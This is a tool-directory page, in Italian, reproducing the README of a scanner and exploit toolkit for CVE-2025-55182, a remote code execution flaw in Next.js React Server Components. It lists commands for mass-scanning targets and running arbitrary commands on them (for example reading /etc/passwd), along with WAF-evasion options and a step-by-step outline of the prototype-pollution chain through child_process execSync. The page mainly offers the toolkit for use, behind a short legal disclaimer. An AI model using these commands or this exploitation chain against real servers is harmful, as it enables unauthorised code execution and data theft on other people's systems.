Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC | Kitploit
Strumenti/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
RicognizioneScanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebBypass WAFPenetration TestingCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Vedi Repository
8 mesi faNon ancora revisionato

Strumento di Exploitation CVE-2025-55182

Uno strumento completo di ricerca sulla sicurezza per testare la vulnerabilità di Remote Code Execution nei React Server Components di Next.js (CVE-2025-55182).

Panoramica

Questo toolkit fornisce capacità automatizzate di rilevamento ed exploitation per CVE-2025-55182, una vulnerabilità RCE critica che colpisce le applicazioni Next.js che utilizzano React Server Components. Il toolkit è composto da tre componenti integrati:

  • NextApp.py - Scanner intelligente di fingerprinting delle applicazioni Next.js
  • exploit.sh - Strumento di exploitation flessibile per target singoli o multipli
  • auto_exploit.sh - Orchestratore automatizzato end-to-end di scansione ed exploitation

Funzionalità

  • Rilevamento Multi-livello: Analisi degli header, scansione del body e fingerprinting JavaScript
  • Punteggio di Confidenza: Classificazione intelligente (Alta/Media/Bassa) per ridurre al minimo i falsi positivi
  • Bypass WAF: Tecniche integrate per eludere i comuni firewall per applicazioni web
  • Scansione di Massa: Elabora più target in modo efficiente con report dettagliati
  • Workflow Automatizzato: Rilevamento ed exploitation con un solo comando
  • Report Dettagliati: File di output completi con risultati categorizzati

Requisiti

Componenti Python

  • Python 3.x
  • Libreria requests
root@kitploit:~
pip3 install requests

Componenti Bash

  • curl
  • openssl
  • Utility Unix standard (sed, grep, awk, mktemp)

Installazione

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Utilizzo

Avvio Rapido (Consigliato)

Il modo più rapido per scansionare ed eseguire l'exploit sui target:

root@kitploit:~
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt

# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"

Solo Rilevamento

Identifica le applicazioni Next.js senza eseguire exploit:

root@kitploit:~
python3 NextApp.py targets.txt

File di output:

  • confirmed_nextjs_targets.txt - Tutte le applicazioni Next.js rilevate
  • high_confidence_nextjs_targets.txt - Solo rilevamenti ad alta confidenza

Exploitation di un Singolo Target

Testa singoli target:

root@kitploit:~
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"

# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k

Exploitation di Massa

Opzione 1: Workflow Unificato (Consigliato)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

Opzione 2: Workflow Manuale in Due Fasi

root@kitploit:~
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt

# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"

Opzioni Avanzate

root@kitploit:~
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Riferimento Comandi

NextApp.py

root@kitploit:~
python3 NextApp.py <targets_file>

Argomenti:

  • targets_file - File di testo contenente gli URL dei target (uno per riga)

exploit.sh

root@kitploit:~
./exploit.sh [OPTIONS]

Opzioni:

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [OPTIONS]

Opzioni:

File di Output

confirmed_nextjs_targets.txt

Generato da NextApp.py - contiene tutti gli URL identificati come applicazioni Next.js.

high_confidence_nextjs_targets.txt

Generato da NextApp.py - contiene solo i rilevamenti Next.js ad alta confidenza (punteggio di confidenza 100+).

exploit_results.txt

Generato da auto_exploit.sh - report di exploitation completo che include:

  • Target vulnerabili con output dei comandi
  • Target non vulnerabili
  • Errori e relativi dettagli
  • Statistiche di riepilogo

Metodologia di Rilevamento

Lo scanner utilizza molteplici tecniche di rilevamento con un sistema di punteggio di confidenza:

Analisi degli Header (50 punti ciascuno)

  • Header specifici di Next.js: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Server: Vercel

Scansione del Body

  • Presenza di __NEXT_DATA__ (100 punti)
  • Pattern buildId di Next.js (50 punti)
  • Percorsi degli asset _next/* (25-75 punti in base alla quantità)

Fingerprinting JavaScript (60 punti)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Soglie di Confidenza:

  • Alta (100+): Molteplici indicatori forti
  • Media (75-99): Diversi indicatori moderati
  • Bassa (50-74): Evidenza minima
  • Sotto 50: Respinta come falso positivo

Meccanismo di Exploitation

L'exploit sfrutta una catena di prototype pollution nei React Server Components di Next.js:

  1. Costruisce dati di form multipart con payload annidato
  2. Inquina la catena __proto__ tramite deserializzazione JSON
  3. Inietta JavaScript arbitrario in _response._prefix
  4. Esegue comandi tramite process.mainModule.require('child_process').execSync()
  5. Estrae i risultati dall'header X-Action-Redirect
  6. Decodifica l'URL e formatta l'output

Tecniche di Bypass WAF

Il toolkit include capacità integrate di bypass WAF:

  • Iniezione di Dati Spazzatura: Antepone dati casuali per bypassare i filtri basati sulla dimensione
  • Boundary Dinamici: Boundary multipart casualizzati
  • Randomizzazione degli ID di Richiesta: ID univoci per ogni richiesta
  • Dimensione Configurabile: Dimensione dei dati spazzatura regolabile (default 128KB)

Abilita con i flag -w o --waf-bypass.

Esempi

Scansione ed Exploit di un'Applicazione Web

root@kitploit:~
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Check results
cat exploit_results.txt

Test di un Singolo Target con Bypass WAF

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Solo Target ad Alta Confidenza

root@kitploit:~
# Step 1: Detect and filter
python3 NextApp.py targets.txt

# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Disclaimer Legale

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Gli utenti devono:

  • ✅ Ottenere esplicita autorizzazione scritta prima di testare qualsiasi sistema
  • ✅ Utilizzarlo solo in incarichi di penetration testing autorizzati
  • ✅ Conformarsi a tutte le leggi e i regolamenti applicabili
  • ✅ Utilizzarlo per ricerca sulla sicurezza difensiva e competizioni CTF

L'accesso non autorizzato ai sistemi informatici è illegale. Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.

Informazioni sulla Vulnerabilità

  • CVE ID: CVE-2025-55182
  • Componenti interessati: React Server Components di Next.js
  • Tipo: Remote Code Execution (RCE)
  • Gravità: Critica

Crediti

Ringraziamenti ai ricercatori di sicurezza che hanno scoperto e divulgato questa vulnerabilità:

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

Contributi

I contributi sono benvenuti! Per favore:

  1. Fai un fork del repository
  2. Crea un branch per la funzionalità
  3. Esegui il commit delle tue modifiche
  4. Invia una pull request

Supporto

Per problemi, domande o richieste di funzionalità, apri una issue su GitHub.

Licenza

Questo progetto è fornito a scopo educativo e per test di sicurezza autorizzati. Usalo in modo responsabile ed etico.

Scarica lo strumento
OptionDescrizionePredefinito
-d, --domainDominio/URL del targethttp://localhost:3000
-f, --fileFile con elenco dei target-
-c, --commandComando da eseguireid
-w, --waf-bypassAbilita bypass WAFDisabilitato
--waf-size SIZEDimensione dati bypass WAF (KB)128
--timeout SECONDSTimeout richiesta15
-k, --insecureSalta verifica SSLDisabilitato
--user-agent AGENTUser-Agent personalizzatoMozilla/5.0...
-h, --helpMostra messaggio di aiuto-
OptionDescrizionePredefinito
-i, --input FILEFile di input dei targetconfirmed_nextjs_targets.txt
-o, --output FILEFile di output dei risultatiexploit_results.txt
-c, --command CMDComando da eseguireid
-w, --waf-bypassAbilita bypass WAFDisabilitato
--waf-size SIZEDimensione bypass WAF (KB)128
--timeout SECONDSTimeout richiesta15
-k, --insecureSalta verifica SSLDisabilitato
--delay SECONDSRitardo tra le richieste2
-s, --scanAuto-scan per Next.js prima dell'exploitDisabilitato
-h, --helpMostra messaggio di aiuto-